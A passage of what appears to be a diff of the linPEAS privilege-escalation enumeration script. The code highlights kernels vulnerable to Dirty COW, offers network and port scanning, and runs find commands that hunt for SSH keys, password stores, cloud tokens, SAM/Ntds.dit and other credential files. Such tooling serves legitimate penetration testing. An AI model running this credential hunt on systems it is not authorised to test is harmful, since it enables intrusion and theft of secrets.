"s,$kernelDCW_Ubuntu_Precise_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel7,${SED_RED_YELLOW}," | sed -${E} "s,$kernelB,${SED_RED}," +printf $LG"User & Groups: "$NC +(id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$idB,${SED_RED},g" +printf $LG"Hostname: "$NC +hostname 2>/dev/null +printf $LG"Writable folder: "$NC; +echo $Wfolder +if [ "$DISCOVER_BAN_GOOD" ]; then + printf $YELLOW"[+] $DISCOVER_BAN_GOOD\n$NC" +else + printf $RED"[-] $DISCOVER_BAN_BAD\n$NC" +fi + +if [ "$SCAN_BAN_GOOD" ]; then + printf $YELLOW"[+] $SCAN_BAN_GOOD\n$NC" +else + printf $RED"[-] $SCAN_BAN_BAD\n$NC" +fi +if [ "$(command -v nmap 2>/dev/null)" ];then + NMAP_GOOD=$GREEN"nmap${BLUE} is available for network discover & port scanning, you should use it yourself" + printf $YELLOW"[+] $NMAP_GOOD\n$NC" +fi +echo "" +echo "" + +########################################### +#--------) Check if network jobs (--------# +########################################### +if [ "$PORTS" ]; then + if [ "$SCAN_BAN_GOOD" ]; then + if [ "$(echo -n $PORTS | sed 's,[0-9, ],,g')" ]; then + printf $RED"[-] Err: Symbols detected in the port, for discovering purposes select only 1 port\n"$NC; + printf ${BLUE}"$HELP"$NC; + exit 0 + else + #Select the correct configuration of the netcat found + select_nc + fi + else + printf $RED" Err: Port scan not possible, any netcat in PATH\n"$NC; + printf ${BLUE}"$HELP"$NC; + exit 0 + fi +fi + +if [ "$DISCOVERY" ]; then + if [ "$PORTS" ]; then + discovery_port_scan $DISCOVERY $PORTS + else + if [ "$DISCOVER_BAN_GOOD" ]; then + discover_network $DISCOVERY + else + printf $RED" Err: Discovery not possible, no fping or ping in PATH\n"$NC; + fi + fi + exit 0 + +elif [ "$IP" ]; then + select_nc + tcp_port_scan $IP "$PORTS" + exit 0 fi +if echo $CHECKS | grep -q procs_crons_timers_srvcs_sockets || echo $CHECKS | grep -q software_information || echo $CHECKS | grep -q interesting_files; then + ########################################### + #----------) Caching Finds (--------------# + ########################################### + + printf $GREEN"Caching directories "$NC + + + #Get home + HOMESEARCH="/home/ /Users/ /root/ $(cat /etc/passwd 2>/dev/null | grep "sh$" | cut -d ":" -f 6 | grep -Ev "^/root|^/home|^/Users" | tr "\n" " ")" + if ! echo "$HOMESEARCH" | grep -q "$HOME" && ! echo "$HOMESEARCH" | grep -qE "^/root|^/home|^/Users"; then #If not listed and not in /home, /Users/ or /root, add current home folder + HOMESEARCH="$HOME $HOMESEARCH" + fi + GREPHOMESEARCH=$(echo "$HOMESEARCH" | sed 's/ *$//g' | tr " " "|") #Remove ending spaces before putting "|" + + CONT_THREADS=0 + # FIND ALL KNOWN INTERESTING SOFTWARE FILES + FIND_DIR_APPLICATIONS=`eval_bckgrd "find /applications -type d -name \"postfix\" -o -name \"mysql\" -o -name \"keyrings\" -o -name \"environments\" -o -name \"logstash\" -o -name \".bluemix\" -o -name \"roundcube\" -o -name \".password-store\" -o -name \"ldap\" -o -name \".irssi\" -o -name \"seeddms*\" -o -name \"filezilla\" -o -name \".cloudflared\" -o -name \"sentry\" -o -name \".vnc\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"sites-enabled\" -o -name \"couchdb\" -o -name \"cacti\" -o -name \"neo4j\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_BIN=`eval_bckgrd "find /bin -type d -name \"postfix\" -o -name \"mysql\" -o -name \"keyrings\" -o -name \"environments\" -o -name \"logstash\" -o -name \".bluemix\" -o -name \"roundcube\" -o -name \".password-store\" -o -name \"ldap\" -o -name \".irssi\" -o -name \"seeddms*\" -o -name \"filezilla\" -o -name \".cloudflared\" -o -name \"sentry\" -o -name \".vnc\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"sites-enabled\" -o -name \"couchdb\" -o -name \"cacti\" -o -name \"neo4j\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_CACHE=`eval_bckgrd "find /.cache -type d -name \"postfix\" -o -name \"mysql\" -o -name \"keyrings\" -o -name \"environments\" -o -name \"logstash\" -o -name \".bluemix\" -o -name \"roundcube\" -o -name \".password-store\" -o -name \"ldap\" -o -name \".irssi\" -o -name \"seeddms*\" -o -name \"filezilla\" -o -name \".cloudflared\" -o -name \"sentry\" -o -name \".vnc\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"sites-enabled\" -o -name \"couchdb\" -o -name \"cacti\" -o -name \"neo4j\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_CDROM=`eval_bckgrd "find /cdrom -type d -name \"postfix\" -o -name \"mysql\" -o -name \"keyrings\" -o -name \"environments\" -o -name \"logstash\" -o -name \".bluemix\" -o -name \"roundcube\" -o -name \".password-store\" -o -name \"ldap\" -o -name \".irssi\" -o -name \"seeddms*\" -o -name \"filezilla\" -o -name \".cloudflared\" -o -name \"sentry\" -o -name \".vnc\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"sites-enabled\" -o -name \"couchdb\" -o -name \"cacti\" -o -name \"neo4j\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_ETC=`eval_bckgrd "find /etc -type d -name \"postfix\" -o -name \"mysql\" -o -name \"keyrings\" -o -name \"environments\" -o -name \"logstash\" -o -name \".bluemix\" -o -name \"roundcube\" -o -name \".password-store\" -o -name \"ldap\" -o -name \".irssi\" -o -name \"seeddms*\" -o -name \"filezilla\" -o -name \".cloudflared\" -o -name \"bind\" -o -name \"sentry\" -o -name \"pam.d\" -o -name \".vnc\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"system.d\" -o -name \"sites-enabled\" -o -name \"couchdb\" -o -name \"system-connections\" -o -name \"cacti\" -o -name \"neo4j\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -type d -name \"postfix\" -o -name \"mysql\" -o -name \"keyrings\" -o -name \"environments\" -o -name \"logstash\" -o -name \".bluemix\" -o -name \"roundcube\" -o -name \".password-store\" -o -name \"ldap\" -o -name \".irssi\" -o -name \"seeddms*\" -o -name \"filezilla\" -o -name \".cloudflared\" -o -name \"sentry\" -o -name \".vnc\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"sites-enabled\" -o -name \"couchdb\" -o -name \"cacti\" -o -name \"neo4j\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_MEDIA=`eval_bckgrd "find /media -type d -name \"postfix\" -o -name \"mysql\" -o -name \"keyrings\" -o -name \"environments\" -o -name \"logstash\" -o -name \".bluemix\" -o -name \"roundcube\" -o -name \".password-store\" -o -name \"ldap\" -o -name \".irssi\" -o -name \"seeddms*\" -o -name \"filezilla\" -o -name \".cloudflared\" -o -name \"sentry\" -o -name \".vnc\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"sites-enabled\" -o -name \"couchdb\" -o -name \"cacti\" -o -name \"neo4j\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_MNT=`eval_bckgrd "find /mnt -type d -name \"postfix\" -o -name \"mysql\" -o -name \"keyrings\" -o -name \"environments\" -o -name \"logstash\" -o -name \".bluemix\" -o -name \"roundcube\" -o -name \".password-store\" -o -name \"ldap\" -o -name \".irssi\" -o -name \"seeddms*\" -o -name \"filezilla\" -o -name \".cloudflared\" -o -name \"sentry\" -o -name \".vnc\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"sites-enabled\" -o -name \"couchdb\" -o -name \"cacti\" -o -name \"neo4j\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_OPT=`eval_bckgrd "find /opt -type d -name \"postfix\" -o -name \"mysql\" -o -name \"keyrings\" -o -name \"environments\" -o -name \"logstash\" -o -name \".bluemix\" -o -name \"roundcube\" -o -name \".password-store\" -o -name \"ldap\" -o -name \".irssi\" -o -name \"seeddms*\" -o -name \"filezilla\" -o -name \".cloudflared\" -o -name \"sentry\" -o -name \".vnc\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"sites-enabled\" -o -name \"couchdb\" -o -name \"cacti\" -o -name \"neo4j\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_PRIVATE=`eval_bckgrd "find /private -type d -name \"postfix\" -o -name \"mysql\" -o -name \"keyrings\" -o -name \"environments\" -o -name \"logstash\" -o -name \".bluemix\" -o -name \"roundcube\" -o -name \".password-store\" -o -name \"ldap\" -o -name \".irssi\" -o -name \"seeddms*\" -o -name \"filezilla\" -o -name \".cloudflared\" -o -name \"sentry\" -o -name \".vnc\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"sites-enabled\" -o -name \"couchdb\" -o -name \"cacti\" -o -name \"neo4j\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_SBIN=`eval_bckgrd "find /sbin -type d -name \"postfix\" -o -name \"mysql\" -o -name \"keyrings\" -o -name \"environments\" -o -name \"logstash\" -o -name \".bluemix\" -o -name \"roundcube\" -o -name \".password-store\" -o -name \"ldap\" -o -name \".irssi\" -o -name \"seeddms*\" -o -name \"filezilla\" -o -name \".cloudflared\" -o -name \"sentry\" -o -name \".vnc\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"sites-enabled\" -o -name \"couchdb\" -o -name \"cacti\" -o -name \"neo4j\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_SNAP=`eval_bckgrd "find /snap -type d -name \"postfix\" -o -name \"mysql\" -o -name \"keyrings\" -o -name \"environments\" -o -name \"logstash\" -o -name \".bluemix\" -o -name \"roundcube\" -o -name \".password-store\" -o -name \"ldap\" -o -name \".irssi\" -o -name \"seeddms*\" -o -name \"filezilla\" -o -name \".cloudflared\" -o -name \"sentry\" -o -name \".vnc\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"sites-enabled\" -o -name \"couchdb\" -o -name \"cacti\" -o -name \"neo4j\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_SRV=`eval_bckgrd "find /srv -type d -name \"postfix\" -o -name \"mysql\" -o -name \"keyrings\" -o -name \"environments\" -o -name \"logstash\" -o -name \".bluemix\" -o -name \"roundcube\" -o -name \".password-store\" -o -name \"ldap\" -o -name \".irssi\" -o -name \"seeddms*\" -o -name \"filezilla\" -o -name \".cloudflared\" -o -name \"sentry\" -o -name \".vnc\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"sites-enabled\" -o -name \"couchdb\" -o -name \"cacti\" -o -name \"neo4j\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_TMP=`eval_bckgrd "find /tmp -type d -name \"postfix\" -o -name \"mysql\" -o -name \"keyrings\" -o -name \"environments\" -o -name \"logstash\" -o -name \".bluemix\" -o -name \"roundcube\" -o -name \".password-store\" -o -name \"ldap\" -o -name \".irssi\" -o -name \"seeddms*\" -o -name \"filezilla\" -o -name \".cloudflared\" -o -name \"sentry\" -o -name \".vnc\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"sites-enabled\" -o -name \"couchdb\" -o -name \"cacti\" -o -name \"neo4j\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_USR=`eval_bckgrd "find /usr -type d -name \"postfix\" -o -name \"mysql\" -o -name \"keyrings\" -o -name \"environments\" -o -name \"logstash\" -o -name \".bluemix\" -o -name \"roundcube\" -o -name \".password-store\" -o -name \"ldap\" -o -name \".irssi\" -o -name \"seeddms*\" -o -name \"filezilla\" -o -name \".cloudflared\" -o -name \"bind\" -o -name \"sentry\" -o -name \".vnc\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"sites-enabled\" -o -name \"couchdb\" -o -name \"cacti\" -o -name \"neo4j\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_VAR=`eval_bckgrd "find /var -type d -name \"postfix\" -o -name \"mysql\" -o -name \"keyrings\" -o -name \"environments\" -o -name \"logstash\" -o -name \".bluemix\" -o -name \"roundcube\" -o -name \".password-store\" -o -name \"kubelet\" -o -name \"ldap\" -o -name \".irssi\" -o -name \"seeddms*\" -o -name \"kube-proxy\" -o -name \"filezilla\" -o -name \".cloudflared\" -o -name \"bind\" -o -name \"sentry\" -o -name \".vnc\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"sites-enabled\" -o -name \"couchdb\" -o -name \"cacti\" -o -name \"neo4j\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_APPLICATIONS=`eval_bckgrd "find /applications -name \"*.pem\" -o -name \"KeePass.config*\" -o -name \"ftp.config\" -o -name \"TokenCache.dat\" -o -name \".k5login\" -o -name \"*.viminfo\" -o -name \"anaconda-ks.cfg\" -o -name \"NetSetup.log\" -o -name \"*vnc*.ini\" -o -name \"*config*.php\" -o -name \"protecteduserkey.bin\" -o -name \"ddclient.conf\" -o -name \"Ntds.dit\" -o -name \"drives.xml\" -o -name \"sentry.conf.py\" -o -name \"*.db\" -o -name \"sysprep.xml\" -o -name \"SYSTEM\" -o -name \"*.csr\" -o -name \"redis.conf\" -o -name \"jetty-realm.properties\" -o -name \"AppEvent.Evt\" -o -name \"*.keystore\" -o -name \"ftp.ini\" -o -name \"my.ini\" -o -name \"gitlab.rm\" -o -name \"autologin\" -o -name \"Dockerfile\" -o -name \"*.socket\" -o -name \"ipsec.conf\" -o -name \"error.log\" -o -name \"access_tokens.db\" -o -name \"elasticsearch.y*ml\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"kcpassword\" -o -name \"*.keyring\" -o -name \"snmpd.conf\" -o -name \"id_rsa*\" -o -name \"*password*\" -o -name \"setupinfo.bak\" -o -name \"default.sav\" -o -name \".git\" -o -name \"kibana.y*ml\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \".profile\" -o -name \"KeePass.enforced*\" -o -name \"*vnc*.c*nf*\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".erlang.cookie\" -o -name \"postgresql.conf\" -o -name \"*.p12\" -o -name \"unattend.txt\" -o -name \"ipsec.secrets\" -o -name \"config.php\" -o -name \".sudo_as_admin_successful\" -o -name \"*.psk\" -o -name \"zabbix_agentd.conf\" -o -name \"passbolt.php\" -o -name \"RDCMan.settings\" -o -name \".rhosts\" -o -name \".lesshst\" -o -name \"hostapd.conf\" -o -name \"supervisord.conf\" -o -name \"secrets.yml\" -o -name \"docker.socket\" -o -name \"cesi.conf\" -o -name \"log4j-core*.jar\" -o -name \"rsyncd.secrets\" -o -name \"groups.xml\" -o -name \"https.conf\" -o -name \"scclient.exe\" -o -name \"krb5.conf\" -o -name \"*.swp\" -o -name \"mongod*.conf\" -o -name \"azureProfile.json\" -o -name \"*.pgp\" -o -name \"unattend.xml\" -o -name \"*.der\" -o -name \"000-default.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"web*.config\" -o -name \"hosts.equiv\" -o -name \"authorized_hosts\" -o -name \".htpasswd\" -o -name \"pgadmin*.db\" -o -name \"*.sqlite3\" -o -name \"php.ini\" -o -name \"index.dat\" -o -name \"access.log\" -o -name \"https-xampp.conf\" -o -name \"AzureRMContext.json\" -o -name \"access_tokens.json\" -o -name \"rsyncd.conf\" -o -name \"*.timer\" -o -name \"mosquitto.conf\" -o -name \".env\" -o -name \"*.key\" -o -name \"my.cnf\" -o -name \"*.rdg\" -o -name \"system.sav\" -o -name \"zabbix_server.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"sitemanager.xml\" -o -name \"*.cer\" -o -name \"passwd\" -o -name \"software\" -o -name \"*.kdbx\" -o -name \"rocketchat.service\" -o -name \"sysprep.inf\" -o -name \"settings.php\" -o -name \"*.gpg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"database.php\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"gvm-tools.conf\" -o -name \"ffftp.ini\" -o -name \"recentservers.xml\" -o -name \"unattended.xml\" -o -name \"backup\" -o -name \"racoon.conf\" -o -name \"sites.ini\" -o -name \"scheduledtasks.xml\" -o -name \".plan\" -o -name \"*.crt\" -o -name \"cloud.cfg\" -o -name \"legacy_credentials.db\" -o -name \"credentials.db\" -o -name \".msmtprc\" -o -name \"kadm5.acl\" -o -name \"storage.php\" -o -name \"setupinfo\" -o -name \"*.ovpn\" -o -name \"*.service\" -o -name \"autologin.conf\" -o -name \".bashrc\" -o -name \".vault-token\" -o -name \"*.ftpconfig\" -o -name \"id_dsa*\" -o -name \"bash.exe\" -o -name \"security.sav\" -o -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"creds*\" -o -name \"iis6.log\" -o -name \".ldaprc\" -o -name \"server.xml\" -o -name \"wsl.exe\" -o -name \"pagefile.sys\" -o -name \"backups\" -o -name \"*.jks\" -o -name \"mariadb.cnf\" -o -name \".pypirc\" -o -name \"SAM\" -o -name \"appcmd.exe\" -o -name \"unattend.inf\" -o -name \"*.gnupg\" -o -name \"ws_ftp.ini\" -o -name \"sssd.conf\" -o -name \"*.pfx\" -o -name \"db.php\" -o -name \"*_history*\" -o -name \"ntuser.dat\" -o -name \"ConsoleHost_history.txt\" -o -name \"gitlab.yml\" -o -name \"filezilla.xml\" -o -name \"winscp.ini\" -o -name \"krb5.keytab\" -o -name \"pgsql.conf\" -o -name \"httpd.conf\" -o -name \"authorized_keys\" -o -name \".google_authenticator\" -o -name \"software.sav\" -o -name \"wp-config.php\" -o -name \"credentials\" -o -name \"vault-ssh-helper.hcl\" -o -name \"tomcat-users.xml\" -o -name \".github\" -o -name \".wgetrc\" -o -name \"*vnc*.xml\" -o -name \"*credential*\" -o -name \".recently-used.xbel\" -o -name \"accessTokens.json\" -o -name \"psk.txt\" -o -name \".git-credentials\" -o -name \".secrets.mkey\" -o -name \"secrets.ldb\" -o -name \"debian.cnf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_BIN=`eval_bckgrd "find /bin -name \"*.pem\" -o -name \"KeePass.config*\" -o -name \"ftp.config\" -o -name \"TokenCache.dat\" -o -name \".k5login\" -o -name \"*.viminfo\" -o -name \"anaconda-ks.cfg\" -o -name \"NetSetup.log\" -o -name \"*vnc*.ini\" -o -name \"*config*.php\" -o -name \"protecteduserkey.bin\" -o -name \"ddclient.conf\" -o -name \"Ntds.dit\" -o -name \"drives.xml\" -o -name \"sentry.conf.py\" -o -name \"*.db\" -o -name \"sysprep.xml\" -o -name \"SYSTEM\" -o -name \"*.csr\" -o -name \"redis.conf\" -o -name \"jetty-realm.properties\" -o -name \"AppEvent.Evt\" -o -name \"*.keystore\" -o -name \"ftp.ini\" -o -name \"my.ini\" -o -name \"gitlab.rm\" -o -name \"autologin\" -o -name \"Dockerfile\" -o -name \"*.socket\" -o -name \"ipsec.conf\" -o -name \"error.log\" -o -name \"access_tokens.db\" -o -name \"elasticsearch.y*ml\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"kcpassword\" -o -name \"*.keyring\" -o -name \"snmpd.conf\" -o -name \"id_rsa*\" -o -name \"*password*\" -o -name \"setupinfo.bak\" -o -name \"default.sav\" -o -name \".git\" -o -name \"kibana.y*ml\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \".profile\" -o -name \"KeePass.enforced*\" -o -name \"*vnc*.c*nf*\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".erlang.cookie\" -o -name \"postgresql.conf\" -o -name \"*.p12\" -o -name \"unattend.txt\" -o -name \"ipsec.secrets\" -o -name \"config.php\" -o -name \".sudo_as_admin_successful\" -o -name \"*.psk\" -o -name \"zabbix_agentd.conf\" -o -name \"passbolt.php\" -o -name \"RDCMan.settings\" -o -name \".rhosts\" -o -name \".lesshst\" -o -name \"hostapd.conf\" -o -name \"supervisord.conf\" -o -name \"secrets.yml\" -o -name \"docker.socket\" -o -name \"cesi.conf\" -o -name \"log4j-core*.jar\" -o -name \"rsyncd.secrets\" -o -name \"groups.xml\" -o -name \"https.conf\" -o -name \"scclient.exe\" -o -name \"krb5.conf\" -o -name \"*.swp\" -o -name \"mongod*.conf\" -o -name \"azureProfile.json\" -o -name \"*.pgp\" -o -name \"unattend.xml\" -o -name \"*.der\" -o -name \"000-default.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"web*.config\" -o -name \"hosts.equiv\" -o -name \"authorized_hosts\" -o -name \".htpasswd\" -o -name \"pgadmin*.db\" -o -name \"*.sqlite3\" -o -name \"php.ini\" -o -name \"index.dat\" -o -name \"access.log\" -o -name \"https-xampp.conf\" -o -name \"AzureRMContext.json\" -o -name \"access_tokens.json\" -o -name \"rsyncd.conf\" -o -name \"*.timer\" -o -name \"mosquitto.conf\" -o -name \".env\" -o -name \"*.key\" -o -name \"my.cnf\" -o -name \"*.rdg\" -o -name \"system.sav\" -o -name \"zabbix_server.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"sitemanager.xml\" -o -name \"*.cer\" -o -name \"passwd\" -o -name \"software\" -o -name \"*.kdbx\" -o -name \"rocketchat.service\" -o -name \"sysprep.inf\" -o -name \"settings.php\" -o -name \"*.gpg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"database.php\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"gvm-tools.conf\" -o -name \"ffftp.ini\" -o -name \"recentservers.xml\" -o -name \"unattended.xml\" -o -name \"backup\" -o -name \"racoon.conf\" -o -name \"sites.ini\" -o -name \"scheduledtasks.xml\" -o -name \".plan\" -o -name \"*.crt\" -o -name \"cloud.cfg\" -o -name \"legacy_credentials.db\" -o -name \"credentials.db\" -o -name \".msmtprc\" -o -name \"kadm5.acl\" -o -name \"storage.php\" -o -name \"setupinfo\" -o -name \"*.ovpn\" -o -name \"*.service\" -o -name \"autologin.conf\" -o -name \".bashrc\" -o -name \".vault-token\" -o -name \"*.ftpconfig\" -o -name \"id_dsa*\" -o -name \"bash.exe\" -o -name \"security.sav\" -o -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"creds*\" -o -name \"iis6.log\" -o -name \".ldaprc\" -o -name \"server.xml\" -o -name \"wsl.exe\" -o -name \"pagefile.sys\" -o -name \"backups\" -o -name \"*.jks\" -o -name \"mariadb.cnf\" -o -name \".pypirc\" -o -name \"SAM\" -o -name \"appcmd.exe\" -o -name \"unattend.inf\" -o -name \"*.gnupg\" -o -name \"ws_ftp.ini\" -o -name \"sssd.conf\" -o -name \"*.pfx\" -o -name \"db.php\" -o -name \"*_history*\" -o -name \"ntuser.dat\" -o -name \"ConsoleHost_history.txt\" -o -name \"gitlab.yml\" -o -name \"filezilla.xml\" -o -name \"winscp.ini\" -o -name \"krb5.keytab\" -o -name \"pgsql.conf\" -o -name \"httpd.conf\" -o -name \"authorized_keys\" -o -name \".google_authenticator\" -o -name \"software.sav\" -o -name \"wp-config.php\" -o -name \"credentials\" -o -name \"vault-ssh-helper.hcl\" -o -name \"tomcat-users.xml\" -o -name \".github\" -o -name \".wgetrc\" -o -name \"*vnc*.xml\" -o -name \"*credential*\" -o -name \".recently-used.xbel\" -o -name \"accessTokens.json\" -o -name \"psk.txt\" -o -name \".git-credentials\" -o -name \".secrets.mkey\" -o -name \"secrets.ldb\" -o -name \"debian.cnf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_CACHE=`eval_bckgrd "find /.cache -name \"*.pem\" -o -name \"KeePass.config*\" -o -name \"ftp.config\" -o -name \"TokenCache.dat\" -o -name \".k5login\" -o -name \"*.viminfo\" -o -name \"anaconda-ks.cfg\" -o -name \"NetSetup.log\" -o -name \"*vnc*.ini\" -o -name \"*config*.php\" -o -name \"protecteduserkey.bin\" -o -name \"ddclient.conf\" -o -name \"Ntds.dit\" -o -name \"drives.xml\" -o -name \"sentry.conf.py\" -o -name \"*.db\" -o -name \"sysprep.xml\" -o -name \"SYSTEM\" -o -name \"*.csr\" -o -name \"redis.conf\" -o -name \"jetty-realm.properties\" -o -name \"AppEvent.Evt\" -o -name \"*.keystore\" -o -name \"ftp.ini\" -o -name \"my.ini\" -o -name \"gitlab.rm\" -o -name \"autologin\" -o -name \"Dockerfile\" -o -name \"*.socket\" -o -name \"ipsec.conf\" -o -name \"error.log\" -o -name \"access_tokens.db\" -o -name \"elasticsearch.y*ml\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"kcpassword\" -o -name \"*.keyring\" -o -name \"snmpd.conf\" -o -name \"id_rsa*\" -o -name \"*password*\" -o -name \"setupinfo.bak\" -o -name \"default.sav\" -o -name \".git\" -o -name \"kibana.y*ml\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \".profile\" -o -name \"KeePass.enforced*\" -o -name \"*vnc*.c*nf*\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".erlang.cookie\" -o -name \"postgresql.conf\" -o -name \"*.p12\" -o -name \"unattend.txt\" -o -name \"ipsec.secrets\" -o -name \"config.php\" -o -name \".sudo_as_admin_successful\" -o -name \"*.psk\" -o -name \"zabbix_agentd.conf\" -o -name \"passbolt.php\" -o -name \"RDCMan.settings\" -o -name \".rhosts\" -o -name \".lesshst\" -o -name \"hostapd.conf\" -o -name \"supervisord.conf\" -o -name \"secrets.yml\" -o -name \"docker.socket\" -o -name \"cesi.conf\" -o -name \"log4j-core*.jar\" -o -name \"rsyncd.secrets\" -o -name \"groups.xml\" -o -name \"https.conf\" -o -name \"scclient.exe\" -o -name \"krb5.conf\" -o -name \"*.swp\" -o -name \"mongod*.conf\" -o -name \"azureProfile.json\" -o -name \"*.pgp\" -o -name \"unattend.xml\" -o -name \"*.der\" -o -name \"000-default.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"web*.config\" -o -name \"hosts.equiv\" -o -name \"authorized_hosts\" -o -name \".htpasswd\" -o -name \"pgadmin*.db\" -o -name \"*.sqlite3\" -o -name \"php.ini\" -o -name \"index.dat\" -o -name \"access.log\" -o -name \"https-xampp.conf\" -o -name \"AzureRMContext.json\" -o -name \"access_tokens.json\" -o -name \"rsyncd.conf\" -o -name \"*.timer\" -o -name \"mosquitto.conf\" -o -name \".env\" -o -name \"*.key\" -o -name \"my.cnf\" -o -name \"*.rdg\" -o -name \"system.sav\" -o -name \"zabbix_server.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"sitemanager.xml\" -o -name \"*.cer\" -o -name \"passwd\" -o -name \"software\" -o -name \"*.kdbx\" -o -name \"rocketchat.service\" -o -name \"sysprep.inf\" -o -name \"settings.php\" -o -name \"*.gpg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"database.php\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"gvm-tools.conf\" -o -name \"ffftp.ini\" -o -name \"recentservers.xml\" -o -name \"unattended.xml\" -o -name \"backup\" -o -name \"racoon.conf\" -o -name \"sites.ini\" -o -name \"scheduledtasks.xml\" -o -name \".plan\" -o -name \"*.crt\" -o -name \"cloud.cfg\" -o -name \"legacy_credentials.db\" -o -name \"credentials.db\" -o -name \".msmtprc\" -o -name \"kadm5.acl\" -o -name \"storage.php\" -o -name \"setupinfo\" -o -name \"*.ovpn\" -o -name \"*.service\" -o -name \"autologin.conf\" -o -name \".bashrc\" -o -name \".vault-token\" -o -name \"*.ftpconfig\" -o -name \"id_dsa*\" -o -name \"bash.exe\" -o -name \"security.sav\" -o -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"creds*\" -o 